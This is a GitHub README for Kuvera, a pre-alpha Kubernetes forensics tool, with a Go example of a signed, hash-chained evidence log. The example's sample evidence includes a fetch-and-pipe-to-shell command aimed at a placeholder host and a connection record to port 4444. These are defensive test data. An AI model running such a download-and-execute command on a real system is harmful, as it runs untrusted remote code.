Jacklevi02/Kuvera-DFIR
GitHub: Jacklevi02/Kuvera-DFIR
Stars: 1 | Forks: 0
# Kuvera
[License: Apache-2.0](https://opensource.org/licenses/Apache-2.0)
## What Kuvera does
When a container in your Kubernetes cluster is compromised, you have seconds — not hours — before the evidence vanishes. Containers die. Pods reschedule. Nodes autoscale away.
Kuvera is an always-on forensic flight recorder for Kubernetes. It runs an eBPF sensor on every node that continuously captures process, file, and network events. When you (or an automated detection) trigger a forensic capture against a pod, Kuvera freezes the container, snapshots its state, packages every piece of evidence with a cryptographic chain of custody, and gives you a unified timeline of exactly what happened.
It is built for incident responders, SOC analysts, and DFIR consultants who need court-admissible evidence from cloud-native environments.
## Core capabilities
- **Always-on eBPF sensor** — continuous, low-overhead capture of syscalls, file access, and network events, scoped to containers
- **One-command capture** — `kubectl create -f capture.yaml` to trigger evidence collection on a target pod
- **Chain of custody** — every artifact SHA-256 hashed, signed, and recorded in an append-only transparency log
- **Unified timeline** — kernel events, container events, Kubernetes audit logs, and cloud audit logs merged into a single investigator view
- **Self-managed** — runs entirely inside your cluster; your evidence never leaves your environment
- **Pluggable analyzers** — extend with custom YARA rules, Volatility plugins, or IOC feeds
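The chain-of-custody capability above (hash every artifact, sign it, record it in an append-only log) is easiest to reason about from a small worked example. The Go program below is an added illustration and is not Kuvera's code: it builds a hash-chained, Ed25519-signed custody log over constructed sample artifacts and shows that verification catches both a modified artifact and a log entry edited to cover the modification. The `Entry`/`Append`/`Verify` names, the artifact paths and the in-memory log are assumptions made for the example.

```go
// Added example, not Kuvera's own code: a hash-chained, Ed25519-signed custody
// log of the kind the "Chain of custody" capability describes. All names,
// artifacts and the in-memory log are constructed for illustration.
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// Entry is one append-only log record for a captured artifact.
type Entry struct {
	Artifact string `json:"artifact"` // path of the evidence inside the capture bundle
	SHA256   string `json:"sha256"`   // hex SHA-256 of the artifact bytes
	Prev     string `json:"prev"`     // digest of the previous entry, "" for the first
	Sig      []byte `json:"sig,omitempty"`
}

// entryDigest hashes everything except Sig; the signature and the next entry's
// Prev both commit to it. Struct field order keeps the JSON deterministic.
func entryDigest(e Entry) string {
	e.Sig = nil
	b, _ := json.Marshal(e)
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// Append hashes the artifact, links the new entry to the last one and signs it.
// The signing key belongs to the operator, never stored beside the evidence.
func Append(log []Entry, priv ed25519.PrivateKey, name string, artifact []byte) []Entry {
	sum := sha256.Sum256(artifact)
	prev := ""
	if n := len(log); n > 0 {
		prev = entryDigest(log[n-1])
	}
	e := Entry{Artifact: name, SHA256: hex.EncodeToString(sum[:]), Prev: prev}
	e.Sig = ed25519.Sign(priv, []byte(entryDigest(e)))
	return append(log, e)
}

// Verify checks chain linkage and signatures, then re-hashes every artifact
// still in storage so a silent edit to the evidence itself is caught.
func Verify(pub ed25519.PublicKey, log []Entry, artifacts map[string][]byte) error {
	prev := ""
	for i, e := range log {
		if e.Prev != prev {
			return fmt.Errorf("entry %d: broken chain link (reordered or removed entry)", i)
		}
		d := entryDigest(e)
		if !ed25519.Verify(pub, []byte(d), e.Sig) {
			return fmt.Errorf("entry %d: bad signature", i)
		}
		if data, ok := artifacts[e.Artifact]; ok {
			if sum := sha256.Sum256(data); hex.EncodeToString(sum[:]) != e.SHA256 {
				return fmt.Errorf("entry %d: artifact %q modified after capture", i, e.Artifact)
			}
		}
		prev = d
	}
	return nil
}

// Demo records three constructed artifacts, then tampers first with a stored
// artifact and then with the log entry describing it, returning what Verify
// reports in each case: nil, a hash-mismatch error, a bad-signature error.
func Demo() (clean, tamperedArtifact, tamperedLog error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return err, err, err
	}
	artifacts := map[string][]byte{ // constructed sample evidence
		"proc/1234/cmdline": []byte("/bin/sh -c curl http://example.invalid/x | sh"),
		"fs/tmp/x":          []byte("#!/bin/sh\nid\n"),
		"net/conns.json":    []byte(`[{"dst":"198.51.100.7:4444"}]`),
	}
	var log []Entry
	for _, name := range []string{"proc/1234/cmdline", "fs/tmp/x", "net/conns.json"} {
		log = Append(log, priv, name, artifacts[name])
	}
	clean = Verify(pub, log, artifacts)

	// Evidence altered after capture: the recorded hash no longer matches.
	artifacts["fs/tmp/x"] = []byte("#!/bin/sh\necho harmless\n")
	tamperedArtifact = Verify(pub, log, artifacts)

	// Log edited to cover the alteration: that entry's signature no longer verifies.
	edited := append([]Entry(nil), log...)
	sum := sha256.Sum256(artifacts["fs/tmp/x"])
	edited[1].SHA256 = hex.EncodeToString(sum[:])
	tamperedLog = Verify(pub, edited, artifacts)
	return clean, tamperedArtifact, tamperedLog
}
```

One caveat this example makes visible: the chain detects edits, reorders and deletions in the middle of the log, but truncating the newest entries leaves a perfectly valid shorter chain. A real transparency log therefore also needs an external checkpoint (the latest entry digest signed or published out of band) that the verifier compares against.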
## Status
Pre-alpha. Active early development. Not production-ready.
## Architecture
```text
┌─────────────────────────────────────────────────────────────────┐
│                        Kubernetes Cluster                       │
│                                                                 │
│  ┌────────────┐   ┌────────────┐   ┌────────────┐               │
│  │   Node 1   │   │   Node 2   │   │   Node N   │               │
│  │ ┌────────┐ │   │ ┌────────┐ │   │ ┌────────┐ │               │
│  │ │ Sensor │ │   │ │ Sensor │ │   │ │ Sensor │ │   DaemonSet   │
│  │ │ (eBPF) │ │   │ │ (eBPF) │ │   │ │ (eBPF) │ │   (Go)        │
│  │ └────┬───┘ │   │ └────┬───┘ │   │ └────┬───┘ │               │
│  └──────┼─────┘   └──────┼─────┘   └──────┼─────┘               │
│         │                │                │                     │
│         └────────────────┴────────────────┘                     │
│                          │                                      │
│                   NATS JetStream                                │
│                          │                                      │
│         ┌────────────────┼────────────────┐                     │
│         │                │                │                     │
│    ┌────▼─────┐    ┌─────▼──────┐    ┌────▼──────┐              │
│    │ Operator │    │  Analyzer  │    │  Console  │              │
│    │   (Go)   │    │  Workers   │    │  API (Go) │              │
│    │          │    │  (Python)  │    │           │              │
│    └────┬─────┘    └─────┬──────┘    └────┬──────┘              │
│         │                │                │                     │
│         └────────────────┼────────────────┘                     │
│                          │                                      │
│              ┌───────────┼───────────┐                          │
│              │           │           │                          │
│         ┌────▼───┐  ┌────▼───┐  ┌────▼─────┐                    │
│         │ MinIO  │  │Postgres│  │OpenSearch│                    │
│         │(blobs) │  │(meta)  │  │(timeline)│                    │
│         └────────┘  └────────┘  └──────────┘                    │
└─────────────────────────────────────────────────────────────────┘
                           │
                           ▼
                   ┌──────────────┐
                   │ Web Console  │
                   │ (TypeScript) │
                   └──────────────┘
```
## Tech stack
- **Sensor:** Go + `cilium/ebpf`
- **Operator:** Go + Kubebuilder
- **API gateway:** Go (gRPC + REST)
- **Analyzer workers:** Python (Volatility3, YARA, custom)
- **Console:** TypeScript, React, Vite, shadcn/ui, TanStack Query
- **Storage:** MinIO (blobs), PostgreSQL + TimescaleDB (metadata), OpenSearch (search)
- **Messaging:** NATS JetStream
- **Deployment:** Helm
## Quickstart (target experience)
```bash
# Install Kuvera into your cluster
helm install kuvera oci://ghcr.io/kuvera/charts/kuvera \
  --namespace kuvera-system --create-namespace

# Verify the sensor DaemonSet is running on every node
kubectl get ds -n kuvera-system

# Trigger a forensic capture on a suspicious pod
cat <
```